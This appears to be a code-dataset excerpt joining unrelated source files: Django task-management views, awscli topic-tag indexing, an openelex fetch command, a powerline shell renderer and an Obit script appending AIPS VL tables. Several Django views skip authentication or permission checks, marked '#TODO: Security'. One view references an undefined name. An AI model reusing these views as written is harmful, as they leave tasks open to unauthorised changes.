return render(request,
'do/task_profile.html',
locals()
)
@login_required
def task_prototype_profile(request, task_prototype_id):
'''
Profile page for Task Prototypes.
Allows editing, adding of children or parents, merging / evolving, etc.
'''
tp = get_object_or_404(TaskPrototype, id = task_prototype_id)
task_prototype_form = TaskPrototypeForm(instance=tp)
generate_form = GenerateTaskForm()
return render(request, 'do/task_prototype_profile.html', locals())
#TODO: Security
def own_task(request, task_id):
task = Task.objects.get(id=task_id)
ownership, newly_owned = task.ownership.get_or_create(owner=request.user)
t = loader.get_template('do/task_box.html')
c = RequestContext(request, {'task':task})
if not task.access_requirements.exists(): #We only want to push publically viewable tasks.
#Pushy Stuff
conn = stomp.Connection()
conn.start()
conn.connect()
task_box_dict = {
'verb_id': task.prototype.type.id,
'task_id': task.id,
'box': t.render(c),
}
        conn.send(json.dumps(task_box_dict), destination="/do/new_tasks")
response_json = { 'success': 1, 'newly_owned':newly_owned, 'task_id': task.id, 'box': t.render(c) }
return HttpResponse( json.dumps(response_json) )
def get_taskbox_toot_court(request, task_id):
task = Task.objects.get(id=task_id)
return render(request, 'do/task_box.html', locals())
#TODO: Ensure permissions
def create_task(request):
'''
This is one of the worst views I have ever written. -Justin
'''
user_can_make_new_prototypes = True #TODO: Turn this into an actual privilege assessment
task_prototype_name_form = TaskPrototypeNameForm()
task_prototype_name_form.fields['name'].widget.attrs['class'] = "topLevel" #So that we can recognize it later via autocomplete. TODO: DO this in the form object.
rest_of_the_task_prototype_form = RestOfTheTaskPrototypeForm() #TODO: Can we please. please. please make this one object.
#Wet and silly. TODO: Fix
class SimpleChildForm(forms.Form):
child = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
class SimpleParentForm(forms.Form):
parent = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
task_prototype_form = TaskPrototypeForm()
task_prototype_parent_form = SimpleParentForm()
task_prototype_child_form = SimpleChildForm()
user_privileges = get_privileges_for_user(request.user)
    try:
        task_prototype_form.fields['name'].initial = request.GET['name']
    except KeyError: #No 'name' query parameter was supplied; leave the initial value unset
        pass
return render(request, 'do/create_task_prototype.html', locals())
def task_form_handler(request):
'''
Deal with the task form. There's a lot of stuff that needs tweaking in here.
'''
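    # Flow: resolve or create the prototype named in the form; for a new prototype,
    # wire up any parent/child progeny entered; instantiate a Task unless
    # "prototype only" was checked; attach the chosen access requirement; then
    # redirect (to the ipso-facto parent's page when one was supplied).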
task_prototype_name_form = TaskPrototypeNameForm()
    name = request.POST['lookup_name'] #Set the name to the actual lookup field TODO: Yeah... have we checked that this form is valid? Do we care?
    task = None #Stays None if only a prototype is created and no Task is instantiated below
#Now let's figure out if they are trying to create a new prototype or just a new task.
try:
this_tp = TaskPrototype.objects.get(name=name)
new = False
except TaskPrototype.DoesNotExist:
verb = Verb.objects.get(id=request.POST['type'])
this_tp = TaskPrototype.objects.create(name=name, type=verb, creator=request.user)
new = True
if not new:
#If this TaskPrototype is not new, all we're going to do is generate its task.
task = this_tp.instantiate(request.user) #Generate the task with the current user as the creator
if new:
#Figure out the relations that were entered. We'll only do that for existing TaskPrototypes.
relations = ['parent', 'child']
for relation in relations:
counter = 1
suffix = relation #For the first iteration, we need it to just say "parent"
while True:
try:
if request.POST['lookup_' + suffix]:
                    autocompleted_object = task_prototype_name_form.fields['name'].to_python(request.POST[suffix]) #Use the autocomplete field's to_python method to grab the object
if autocompleted_object:
related_object = autocompleted_object
else: #They didn't successfully autocomplete; looks like we're making an object up unless the name happens to be an exact match.
what_they_typed = request.POST['lookup_' + suffix]
related_object, is_new = TaskPrototype.objects.get_or_create(name = what_they_typed, defaults={'type': this_tp.type, 'creator': request.user})
                    #At this point in the function, we now know for sure what the related object is. Either they autocompleted, typed a name that matched but didn't autocomplete, or they're making a new one.
if relation == "child":
parent = this_tp
child = related_object
priority = (counter * 5)
if relation == "parent":
parent = related_object
child = this_tp
current_max_priority_ag = related_object.children.all().aggregate(Max('priority'))
current_max_priority = current_max_priority_ag['priority__max']
try:
priority = int(current_max_priority) + 5 #Try setting the priority to the highest priority plus 5
except TypeError:
priority = 5 #Fuck it, there is no priority at all; we'll start it at 5
TaskPrototypeProgeny.objects.create(parent = parent, child = child, priority = priority )
else:
break
except MultiValueDictKeyError:
break
counter += 1
suffix = relation + str(counter) #Preparing for the second iteration, it says "parent1"
    try:
        if request.POST['no_generate']: #They clicked 'prototype only,' so they don't want us to run .instantiate()
            pass
    except KeyError: #They didn't click "prototype only," thus they want the Task to be generated.
        if task is None: #Guard against instantiating a second Task when the prototype already existed
            task = this_tp.instantiate(request.user) #Generate the task with the current user as the creator
    #Now we'll deal with the access requirements, but only if a Task was actually generated.
    if task is not None:
        privilege = Privilege.objects.get(id = request.POST['access_requirement'])
        task_access_prototype = TaskAccessPrototype.objects.get_or_create(privilege = privilege, type=5)[0] #Hardcoded 5 - this ought to be an option in the form
        task_access = TaskAccess.objects.create(prototype=task_access_prototype, task = task)
#I mean, seriously, shouldn't this be a post-save hook?
if task:
messages.success(request, 'You created <a href="%s">%s</a>.' % (task.get_absolute_url(), this_tp.name)) #TODO: Distinguish messages between creation of TaskPrototype and Task objects.
else:
messages.success(request, 'You created %s.' % this_tp.name) #TODO: Distinguish messages between creation of TaskPrototype and Task objects.
#We may have arrived here from the Task Profile form or some other place where at least one parent is certain. Let's find out.
try:
parent_ipso_facto_id = request.POST['parentIdIpsoFacto']
parent_task = Task.objects.get(id=parent_ipso_facto_id) #By jove, it's tru! Our new task already has a parent Task.
current_max_priority_ag = parent_task.children.all().aggregate(Max('priority'))
current_max_priority = current_max_priority_ag['priority__max']
try: #TODO: Boy, it's started to feel like we need a max_priority method, eh?
priority = int(current_max_priority) + 5 #Try setting the priority to the highest priority plus 5
except TypeError:
priority = 5 #Fuck it, there is no priority at all; we'll start it at 5
task_progeny = TaskProgeny.objects.create(parent=parent_task, child=task, priority = priority)
return HttpResponseRedirect(parent_task.get_absolute_url())
except MultiValueDictKeyError:
pass #Nope, guess not.
return HttpResponseRedirect('/do/create_task') #TODO: Dehydrate this using the reverse of the create task view.
@login_required
def new_child_ajax_handler(request):
form = TaskForm(request.POST)
if form.is_valid():
#First create the child task.
new_child_task = form.save()
#Now create the relationship to the parent.
try:
parent_id = request.POST['parent_id']
parent_task = Task.objects.get(id = parent_id)
siblings = parent_task.children.all() #Siblings of the task we just created
highest_order_rank = siblings.aggregate(Max('order_rank'))['order_rank__max']
if highest_order_rank:
new_order_rank = highest_order_rank + 1
else:
new_order_rank = 1
hierarchy = TaskProgeny.objects.create(child = new_child_task, parent = parent_task, order_rank = new_order_rank)
return HttpResponse(1)
    except KeyError: #request.POST raises MultiValueDictKeyError (a KeyError subclass), never IndexError
raise RuntimeError('The Parent ID got yanked from the form. Not cool.')
else:
#TODO: This is an exact repeat of the invalid handler in utility.views.submit_generic. DRY it up.
errors = []
for error in form.errors:
errors.append(error)
    dumps = json.dumps(errors)
return HttpResponse(dumps)
#TODO: Check that the user has proper authority
def task_family_as_checklist_template(request):
'''
Takes a Task or TaskPrototype and returns the children as a checklist template.
I don't love this function. It can be far more generic and helpful with a little tinkering. -Justin
'''
is_prototype = request.GET['is_prototype'] #Are we looking for a Task or a TaskPrototype?
id = request.GET['id']
try:
number_to_show = request.GET['limit'] #Maybe they specified a number of children to list....
except KeyError:
number_to_show = False #....maybe they didn't.
task_maybe_prototype_model = TaskPrototype if is_prototype else Task
task_maybe_prototype = task_maybe_prototype_model.objects.get(id=id)
model_name = task_maybe_prototype_model.__name__
progeny_objects = task_maybe_prototype.children.all()
    if number_to_show:
        progeny_objects = progeny_objects[:int(number_to_show)] #QuerySets are sliced, not .limit()ed
return render(request, 'do/children_checklist.html', locals())
def task_prototype_list(request):
task_prototypes = TaskPrototype.objects.all()
return render(request, 'do/task_prototype_list.html', locals())
def get_people_for_verb_as_html(request, verb_id):
'''
Shows peoples' names in the public list page.
'''
verb = Verb.objects.get(id=verb_id)
people = verb.users_who_have_completed_tasks()
return render(request, 'do/people_list.html', locals() )
def get_tasks_as_html(request, object_id, by_verb=True, mix_progeny=False):
'''
Ajax specialized method that returns, in HTML, all the tasks to which a user has access within a specific verb or tag.
If verb is true, get by task. Otherwise, by tag.
Typical use case is a refresh signal sent by the push module or a click on the "three columns" page.
'''
if not by_verb:
tag = Tag.objects.get(id=object_id)
tagged_tasks = tag.taggit_taggeditem_items.filter(content_type = T) #TODO: Apply privileges
if not request.user.is_authenticated():
group_name = request.GET['group']
group = Group.objects.get(name=group_name)
privilege = get_object_or_404(Privilege, prototype__name="Anybody", jurisdiction=group)
access_objects = TaskAccess.objects.filter(prototype__privilege = privilege)
access_tasks = Task.objects.filter(access_requirements__in = access_objects, resolutions__isnull=True).distinct()
if by_verb:
verb = Verb.objects.get(id=object_id)
tasks = access_tasks.filter(prototype__type = verb)
else:
tasks_from_tag = tagged_tasks.filter(task__access_requirements__in = access_objects, resolutions__isnull=True).distinct()
tasks = set()
for task_from_tag in tasks_from_tag:
tasks.add(task_from_tag.content_object)
else: #They're logged in.
if by_verb:
verb = Verb.objects.get(id=object_id)
tasks = verb.get_tasks_for_user(request.user)
else:
tasks_from_tag = tagged_tasks #TODO: Again, privileges
tasks = set()
for task_from_tag in tasks_from_tag:
if task_from_tag.content_object.resolutions.count() == 0:
tasks.add(task_from_tag.content_object)
if not mix_progeny:
#Let's make sure that no child task is listed alongside its parent.
tasks_to_remove = set()
for task in tasks:
for progeny in task.parents.all():
if progeny.parent in tasks:
tasks_to_remove.add(task)
task_set = set(tasks) - tasks_to_remove
tasks = task_set
return render(request, 'do/task_list.html', locals())
#TODO: Security
def mark_completed(request, task_id):
task = Task.objects.get(id=task_id)
resolution = TaskResolution.objects.create(task=task, type="C", creator=request.user)
return HttpResponse(1)
def mark_abandoned(request):
return HttpResponse(1)
def update_task(request, task_id):
task = Task.objects.get(id=task_id)
task.update_to_prototype(user=request.user)
return redirect(task.get_absolute_url())
@login_required
def post_task_message(request, task_id):
'''
    Take a message about a task; if the form marked it completed, set the task's status accordingly.
If the message field is not blank, send it to the social view to handle the text of the message.
'''
task = Task.objects.get(id=task_id)
try:
if request.POST['completed']:
task.set_status(2, request.user)
except MultiValueDictKeyError:
pass #They didn't mark it completed, no need to think about it further.
if request.POST['message']:
post_top_level_message(request, 'do__task__%s' % (task_id))
return HttpResponseRedirect(task.get_absolute_url())
def protocols(request):
'''
SlashRoot's policies, procedures, and protocols listed here.
Perhaps this will be eliminated once we get the organization of tasks under better control since most of these will be tasks.
'''
protocols = Protocol.objects.all()
return render(request,'do/protocols.html',{'protocols':protocols})
def archives(request):
#completed_tasks = TaskResolution.objects.filter(type='C').order_by('-created')
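    # NOTE: SERVICE_PROTOTYPE is neither defined nor imported in this module, so
    # this view raises NameError as written; it presumably refers to a
    # TaskPrototype configured elsewhere.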
tasks = SERVICE_PROTOTYPE.instances.filter(status__gt=1).all()
return render(request, 'do/archives.html', locals()) | mit | 6,919,415,892,415,682,000 | 41.278689 | 212 | 0.630849 | false | 4.018352 | false | false | false |
mnahm5/django-estore | Lib/site-packages/awscli/topictags.py | 2 | 12651 | # Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import os
import json
import docutils.core
class TopicTagDB(object):
"""This class acts like a database for the tags of all available topics.
A tag is an element in a topic reStructured text file that contains
information about a topic. Information can range from titles to even
related CLI commands. Here are all of the currently supported tags:
Tag Meaning Required?
--- ------- ---------
:title: The title of the topic Yes
:description: Sentence description of topic Yes
:category: Category topic falls under Yes
:related topic: A related topic No
:related command: A related command No
To see examples of how to specify tags, look in the directory
awscli/topics. Note that tags can have multiple values by delimiting
values with commas. All tags must be on their own line in the file.
    This class can load a JSON index representing all topics and their tags,
scan all of the topics and store the values of their tags, retrieve the
tag value for a particular topic, query for all the topics with a specific
tag and/or value, and save the loaded data back out to a JSON index.
The structure of the database can be viewed as a python dictionary:
{'topic-name-1': {
'title': ['My First Topic Title'],
'description': ['This describes my first topic'],
'category': ['General Topics', 'S3'],
'related command': ['aws s3'],
'related topic': ['topic-name-2']
},
'topic-name-2': { .....
}
The keys of the dictionary are the CLI command names of the topics. These
    names are based off the name of the reStructured text file that corresponds
to the topic. The value of these keys are dictionaries of tags, where the
tags are keys and their value is a list of values for that tag. Note
that all tag values for a specific tag of a specific topic are unique.
"""
VALID_TAGS = ['category', 'description', 'title', 'related topic',
'related command']
# The default directory to look for topics.
TOPIC_DIR = os.path.join(
os.path.dirname(
os.path.abspath(__file__)), 'topics')
# The default JSON index to load.
JSON_INDEX = os.path.join(TOPIC_DIR, 'topic-tags.json')
def __init__(self, tag_dictionary=None, index_file=JSON_INDEX,
topic_dir=TOPIC_DIR):
"""
:param index_file: The path to a specific JSON index to load.
If nothing is specified it will default to the default JSON
index at ``JSON_INDEX``.
:param topic_dir: The path to the directory where to retrieve
the topic source files. Note that if you store your index
in this directory, you must supply the full path to the json
index to the ``file_index`` argument as it may not be ignored when
listing topic source files. If nothing is specified it will
default to the default directory at ``TOPIC_DIR``.
"""
self._tag_dictionary = tag_dictionary
if self._tag_dictionary is None:
self._tag_dictionary = {}
self._index_file = index_file
self._topic_dir = topic_dir
@property
def index_file(self):
return self._index_file
@index_file.setter
def index_file(self, value):
self._index_file = value
@property
def topic_dir(self):
return self._topic_dir
@topic_dir.setter
def topic_dir(self, value):
self._topic_dir = value
@property
def valid_tags(self):
return self.VALID_TAGS
def load_json_index(self):
"""Loads a JSON file into the tag dictionary."""
with open(self.index_file, 'r') as f:
self._tag_dictionary = json.load(f)
def save_to_json_index(self):
"""Writes the loaded data back out to the JSON index."""
with open(self.index_file, 'w') as f:
f.write(json.dumps(self._tag_dictionary, indent=4, sort_keys=True))
def get_all_topic_names(self):
"""Retrieves all of the topic names of the loaded JSON index"""
return list(self._tag_dictionary)
def get_all_topic_src_files(self):
"""Retrieves the file paths of all the topics in directory"""
topic_full_paths = []
topic_names = os.listdir(self.topic_dir)
for topic_name in topic_names:
# Do not try to load hidden files.
if not topic_name.startswith('.'):
topic_full_path = os.path.join(self.topic_dir, topic_name)
# Ignore the JSON Index as it is stored with topic files.
if topic_full_path != self.index_file:
topic_full_paths.append(topic_full_path)
return topic_full_paths
def scan(self, topic_files):
"""Scan in the tags of a list of topics into memory.
Note that if there are existing values in an entry in the database
of tags, they will not be overwritten. Any new values will be
appended to original values.
:param topic_files: A list of paths to topics to scan into memory.
"""
for topic_file in topic_files:
with open(topic_file, 'r') as f:
# Parse out the name of the topic
topic_name = self._find_topic_name(topic_file)
# Add the topic to the dictionary if it does not exist
self._add_topic_name_to_dict(topic_name)
topic_content = f.read()
# Record the tags and the values
self._add_tag_and_values_from_content(
topic_name, topic_content)
def _find_topic_name(self, topic_src_file):
# Get the name of each of these files
topic_name_with_ext = os.path.basename(topic_src_file)
# Strip of the .rst extension from the files
return topic_name_with_ext[:-4]
def _add_tag_and_values_from_content(self, topic_name, content):
# Retrieves tags and values and adds from content of topic file
# to the dictionary.
doctree = docutils.core.publish_doctree(content).asdom()
fields = doctree.getElementsByTagName('field')
for field in fields:
field_name = field.getElementsByTagName('field_name')[0]
field_body = field.getElementsByTagName('field_body')[0]
# Get the tag.
tag = field_name.firstChild.nodeValue
if tag in self.VALID_TAGS:
# Get the value of the tag.
values = field_body.childNodes[0].firstChild.nodeValue
                # Separate the values into a list by splitting at commas
tag_values = values.split(',')
# Strip the white space around each of these values.
for i in range(len(tag_values)):
tag_values[i] = tag_values[i].strip()
self._add_tag_to_dict(topic_name, tag, tag_values)
else:
raise ValueError(
"Tag %s found under topic %s is not supported."
% (tag, topic_name)
)
def _add_topic_name_to_dict(self, topic_name):
# This method adds a topic name to the dictionary if it does not
# already exist
# Check if the topic is in the topic tag dictionary
if self._tag_dictionary.get(topic_name, None) is None:
self._tag_dictionary[topic_name] = {}
def _add_tag_to_dict(self, topic_name, tag, values):
# This method adds a tag to the dictionary given its tag and value
# If there are existing values associated to the tag it will add
# only values that previously did not exist in the list.
# Add topic to the topic tag dictionary if needed.
self._add_topic_name_to_dict(topic_name)
# Get all of a topics tags
topic_tags = self._tag_dictionary[topic_name]
self._add_key_values(topic_tags, tag, values)
def _add_key_values(self, dictionary, key, values):
# This method adds a value to a dictionary given a key.
# If there are existing values associated to the key it will add
# only values that previously did not exist in the list. All values
# in the dictionary should be lists
if dictionary.get(key, None) is None:
dictionary[key] = []
for value in values:
if value not in dictionary[key]:
dictionary[key].append(value)
def query(self, tag, values=None):
"""Groups topics by a specific tag and/or tag value.
:param tag: The name of the tag to query for.
:param values: A list of tag values to only include in query.
If no value is provided, all possible tag values will be returned
:rtype: dictionary
:returns: A dictionary whose keys are all possible tag values and the
keys' values are all of the topic names that had that tag value
in its source file. For example, if ``topic-name-1`` had the tag
``:category: foo, bar`` and ``topic-name-2`` had the tag
``:category: foo`` and we queried based on ``:category:``,
the returned dictionary would be:
{
'foo': ['topic-name-1', 'topic-name-2'],
'bar': ['topic-name-1']
}
"""
query_dict = {}
for topic_name in self._tag_dictionary.keys():
# Get the tag values for a specified tag of the topic
if self._tag_dictionary[topic_name].get(tag, None) is not None:
tag_values = self._tag_dictionary[topic_name][tag]
for tag_value in tag_values:
# Add the values to dictionary to be returned if
# no value constraints are provided or if the tag value
# falls in the allowed tag values.
if values is None or tag_value in values:
self._add_key_values(query_dict,
key=tag_value,
values=[topic_name])
return query_dict
def get_tag_value(self, topic_name, tag, default_value=None):
"""Get a value of a tag for a topic
:param topic_name: The name of the topic
:param tag: The name of the tag to retrieve
:param default_value: The value to return if the topic and/or tag
does not exist.
"""
if topic_name in self._tag_dictionary:
return self._tag_dictionary[topic_name].get(tag, default_value)
return default_value
def get_tag_single_value(self, topic_name, tag):
"""Get the value of a tag for a topic (i.e. not wrapped in a list)
:param topic_name: The name of the topic
:param tag: The name of the tag to retrieve
        :raises ValueError: Raised if there is not exactly one value
in the list value.
"""
value = self.get_tag_value(topic_name, tag)
if value is not None:
if len(value) != 1:
raise ValueError(
                    'Tag %s for topic %s has value %s. Expected a single '
                    'element in list.' % (tag, topic_name, value)
)
value = value[0]
return value
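# Minimal usage sketch (hypothetical topic names; the class defaults above apply):
#
#     db = TopicTagDB()
#     db.scan(db.get_all_topic_src_files())  # parse :tag: fields out of the topic .rst files
#     db.query('category')                   # e.g. {'S3': ['s3-config', ...], ...}
#     db.save_to_json_index()                # persist the collected tags back to JSON_INDEX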
| mit | -4,637,528,009,400,645,000 | 41.884746 | 79 | 0.606592 | false | 4.320697 | false | false | false |
openelections/openelections-core | openelex/tasks/fetch.py | 2 | 1291 | import sys
import click
from openelex.base.fetch import BaseFetcher
from .utils import default_state_options, load_module
@click.command(help="Scrape data files and store in local file cache "
"under standardized name")
@default_state_options
@click.option('--unprocessed', is_flag=True,
help="Fetch unprocessed data files only")
def fetch(state, datefilter='', unprocessed=False):
"""
Scrape data files and store in local file cache
under standardized name.
State is required. Optionally provide 'datefilter'
to limit files that are fetched.
"""
state_mod = load_module(state, ['datasource', 'fetch'])
datasrc = state_mod.datasource.Datasource()
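    # Prefer the state's own FetchResults implementation when its module defines
    # one; otherwise fall back to the generic BaseFetcher for that state.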
if hasattr(state_mod, 'fetch'):
fetcher = state_mod.fetch.FetchResults()
else:
fetcher = BaseFetcher(state)
if unprocessed:
try:
filename_url_pairs = datasrc.unprocessed_filename_url_pairs(datefilter)
except NotImplementedError:
sys.exit("No unprocessed data files are available. Try running this "
"task without the --unprocessed option.")
else:
filename_url_pairs = datasrc.filename_url_pairs(datefilter)
for std_filename, url in filename_url_pairs:
fetcher.fetch(url, std_filename)
| mit | -5,731,460,157,850,020,000 | 32.973684 | 83 | 0.684741 | false | 3.984568 | false | false | false |
DaneelOliwan/dotfiles-vim | .vim/bundle/powerline/powerline/renderers/shell.py | 1 | 1842 | # vim:fileencoding=utf-8:noet
from powerline.renderer import Renderer
from powerline.colorscheme import ATTR_BOLD, ATTR_ITALIC, ATTR_UNDERLINE
def int_to_rgb(num):
r = (num >> 16) & 0xff
g = (num >> 8) & 0xff
b = num & 0xff
return r, g, b
class ShellRenderer(Renderer):
'''Powerline shell segment renderer.'''
escape_hl_start = ''
escape_hl_end = ''
term_truecolor = False
tmux_escape = False
screen_escape = False
def hlstyle(self, fg=None, bg=None, attr=None):
'''Highlight a segment.
If an argument is None, the argument is ignored. If an argument is
False, the argument is reset to the terminal defaults. If an argument
is a valid color or attribute, it's added to the ANSI escape code.
'''
ansi = [0]
if fg is not None:
if fg is False or fg[0] is False:
ansi += [39]
else:
if self.term_truecolor:
ansi += [38, 2] + list(int_to_rgb(fg[1]))
else:
ansi += [38, 5, fg[0]]
if bg is not None:
if bg is False or bg[0] is False:
ansi += [49]
else:
if self.term_truecolor:
ansi += [48, 2] + list(int_to_rgb(bg[1]))
else:
ansi += [48, 5, bg[0]]
if attr is not None:
if attr is False:
ansi += [22]
else:
if attr & ATTR_BOLD:
ansi += [1]
elif attr & ATTR_ITALIC:
# Note: is likely not to work or even be inverse in place of
# italic. Omit using this in colorschemes.
ansi += [3]
elif attr & ATTR_UNDERLINE:
ansi += [4]
r = '\033[{0}m'.format(';'.join(str(attr) for attr in ansi))
if self.tmux_escape:
r = '\033Ptmux;' + r.replace('\033', '\033\033') + '\033\\'
elif self.screen_escape:
r = '\033P' + r.replace('\033', '\033\033') + '\033\\'
return self.escape_hl_start + r + self.escape_hl_end
@staticmethod
def escape(string):
return string.replace('\\', '\\\\')
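# Illustrative output: with the class defaults, hlstyle(fg=(160, 0xd70000)) returns
# '\033[0;38;5;160m' (256-color SGR); with term_truecolor=True the same call returns
# '\033[0;38;2;215;0;0m', since int_to_rgb(0xd70000) == (215, 0, 0).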
renderer = ShellRenderer
| gpl-2.0 | -9,140,306,692,351,152,000 | 25.314286 | 72 | 0.614007 | false | 2.782477 | false | false | false |
kernsuite-debian/obit | python/scriptCopyVLTab.py | 2 | 18118 | # Python script to copy AIPS VL tables
import Table, Image, OErr, OSystem
# Init Obit
err=OErr.OErr()
ObitSys=OSystem.OSystem ("CopyVLTables", 1, 103, 1, ["None"],
2, ["../FITSdata/","/mnt/cdrom/MAPS/"], 1, 0, err)
OErr.printErrMsg(err, "Error with Obit startup")
outfile = "Catalog.fits"
outdisk = 1
indisk = 2
def AppendVLTable (infile, outfile=outfile, err=err):
""" Copy VL table ver 1 from infile to outfile
infile = name of input FITS image file with VL table
outfile = name of output FITS image file with extant VL table
err = Python Obit Error/message stack
"""
################################################################
# Get images
inImage = Image.newPImage("Input image", infile, indisk, 1, err)
outImage = Image.newPImage("Output image", outfile, outdisk, 1, err)
OErr.printErrMsg(err, "Error creating image objects")
#
# obtain "AIPS VL" tables from each
inTable = Image.PImageNewImageTable(inImage, 1, "AIPS VL", 1, err)
outTable = Image.PImageNewImageTable(outImage, 3, "AIPS VL", 1, err)
OErr.printErrMsg(err, "Error extracting AIPS VL table objects")
# Concatenate
Table.PConcat (inTable, outTable, err)
    OErr.printErrMsg(err, "Error concatenating tables")
print "Appended",infile,"to",outfile
# end AppendVLTable
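# The explicit per-field calls below could equally be driven from a list, e.g.:
#     for f in ("I1808M04.gz", "I1808M08.gz"):  # ...and so on
#         AppendVLTable(f)
# They are spelled out one call per NVSS image file.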
# CD 4 of NVSS
AppendVLTable ("I1808M04.gz")
AppendVLTable ("I1808M08.gz")
AppendVLTable ("I1808M12.gz")
AppendVLTable ("I1808M16.gz")
#no table AppendVLTable ("I1808M20.gz")
AppendVLTable ("I1808M24.gz")
AppendVLTable ("I1808M28.gz")
AppendVLTable ("I1808P00.gz")
AppendVLTable ("I1808P04.gz")
AppendVLTable ("I1808P08.gz")
AppendVLTable ("I1808P12.gz")
AppendVLTable ("I1808P16.gz")
AppendVLTable ("I1808P20.gz")
AppendVLTable ("I1808P24.gz")
AppendVLTable ("I1808P28.gz")
AppendVLTable ("I1818M32.gz")
AppendVLTable ("I1818M36.gz")
AppendVLTable ("I1818P32.gz")
AppendVLTable ("I1818P36.gz")
AppendVLTable ("I1820M40.gz")
AppendVLTable ("I1820P40.gz")
AppendVLTable ("I1820P44.gz")
AppendVLTable ("I1820P48.gz")
AppendVLTable ("I1824M04.gz")
AppendVLTable ("I1824M08.gz")
AppendVLTable ("I1824M12.gz")
AppendVLTable ("I1824M16.gz")
AppendVLTable ("I1824M20.gz")
AppendVLTable ("I1824M24.gz")
AppendVLTable ("I1824M28.gz")
AppendVLTable ("I1824P00.gz")
AppendVLTable ("I1824P04.gz")
AppendVLTable ("I1824P08.gz")
AppendVLTable ("I1824P12.gz")
AppendVLTable ("I1824P16.gz")
AppendVLTable ("I1824P20.gz")
AppendVLTable ("I1824P24.gz")
AppendVLTable ("I1824P28.gz")
AppendVLTable ("I1824P52.gz")
AppendVLTable ("I1824P56.gz")
AppendVLTable ("I1830P60.gz")
AppendVLTable ("I1830P64.gz")
AppendVLTable ("I1836M32.gz")
AppendVLTable ("I1836M36.gz")
AppendVLTable ("I1836P32.gz")
AppendVLTable ("I1836P36.gz")
AppendVLTable ("I1836P68.gz")
AppendVLTable ("I1840M04.gz")
AppendVLTable ("I1840M08.gz")
AppendVLTable ("I1840M12.gz")
AppendVLTable ("I1840M16.gz")
AppendVLTable ("I1840M20.gz")
AppendVLTable ("I1840M24.gz")
AppendVLTable ("I1840M28.gz")
AppendVLTable ("I1840M40.gz")
AppendVLTable ("I1840P00.gz")
AppendVLTable ("I1840P04.gz")
AppendVLTable ("I1840P08.gz")
AppendVLTable ("I1840P12.gz")
AppendVLTable ("I1840P16.gz")
AppendVLTable ("I1840P20.gz")
AppendVLTable ("I1840P24.gz")
AppendVLTable ("I1840P28.gz")
AppendVLTable ("I1840P40.gz")
AppendVLTable ("I1840P44.gz")
AppendVLTable ("I1840P48.gz")
AppendVLTable ("I1845P72.gz")
AppendVLTable ("I1845P76.gz")
AppendVLTable ("I1848P52.gz")
AppendVLTable ("I1848P56.gz")
AppendVLTable ("I1854M32.gz")
AppendVLTable ("I1854M36.gz")
AppendVLTable ("I1854P32.gz")
AppendVLTable ("I1854P36.gz")
AppendVLTable ("I1856M04.gz")
AppendVLTable ("I1856M08.gz")
AppendVLTable ("I1856M12.gz")
AppendVLTable ("I1856M16.gz")
AppendVLTable ("I1856M20.gz")
AppendVLTable ("I1856M24.gz")
AppendVLTable ("I1856M28.gz")
AppendVLTable ("I1856P00.gz")
AppendVLTable ("I1856P04.gz")
AppendVLTable ("I1856P08.gz")
AppendVLTable ("I1856P12.gz")
AppendVLTable ("I1856P16.gz")
AppendVLTable ("I1856P20.gz")
AppendVLTable ("I1856P24.gz")
AppendVLTable ("I1856P28.gz")
AppendVLTable ("I1900M40.gz")
AppendVLTable ("I1900P40.gz")
AppendVLTable ("I1900P44.gz")
AppendVLTable ("I1900P48.gz")
AppendVLTable ("I1900P60.gz")
AppendVLTable ("I1900P64.gz")
AppendVLTable ("I1900P80.gz")
AppendVLTable ("I1912M04.gz")
AppendVLTable ("I1912M08.gz")
AppendVLTable ("I1912M12.gz")
AppendVLTable ("I1912M16.gz")
AppendVLTable ("I1912M20.gz")
AppendVLTable ("I1912M24.gz")
AppendVLTable ("I1912M28.gz")
AppendVLTable ("I1912M32.gz")
AppendVLTable ("I1912M36.gz")
AppendVLTable ("I1912P00.gz")
AppendVLTable ("I1912P04.gz")
AppendVLTable ("I1912P08.gz")
AppendVLTable ("I1912P12.gz")
AppendVLTable ("I1912P16.gz")
AppendVLTable ("I1912P20.gz")
AppendVLTable ("I1912P24.gz")
AppendVLTable ("I1912P28.gz")
AppendVLTable ("I1912P32.gz")
AppendVLTable ("I1912P36.gz")
AppendVLTable ("I1912P52.gz")
AppendVLTable ("I1912P56.gz")
AppendVLTable ("I1912P68.gz")
AppendVLTable ("I1920M40.gz")
AppendVLTable ("I1920P40.gz")
AppendVLTable ("I1920P44.gz")
AppendVLTable ("I1920P48.gz")
AppendVLTable ("I1928M04.gz")
AppendVLTable ("I1928M08.gz")
AppendVLTable ("I1928M12.gz")
AppendVLTable ("I1928M16.gz")
AppendVLTable ("I1928M20.gz")
AppendVLTable ("I1928M24.gz")
AppendVLTable ("I1928M28.gz")
AppendVLTable ("I1928P00.gz")
AppendVLTable ("I1928P04.gz")
AppendVLTable ("I1928P08.gz")
AppendVLTable ("I1928P12.gz")
AppendVLTable ("I1928P16.gz")
AppendVLTable ("I1928P20.gz")
AppendVLTable ("I1928P24.gz")
AppendVLTable ("I1928P28.gz")
AppendVLTable ("I1930M32.gz")
AppendVLTable ("I1930M36.gz")
AppendVLTable ("I1930P32.gz")
AppendVLTable ("I1930P36.gz")
AppendVLTable ("I1930P60.gz")
AppendVLTable ("I1930P64.gz")
AppendVLTable ("I1930P72.gz")
AppendVLTable ("I1930P76.gz")
AppendVLTable ("I1930P84.gz")
AppendVLTable ("I1936P52.gz")
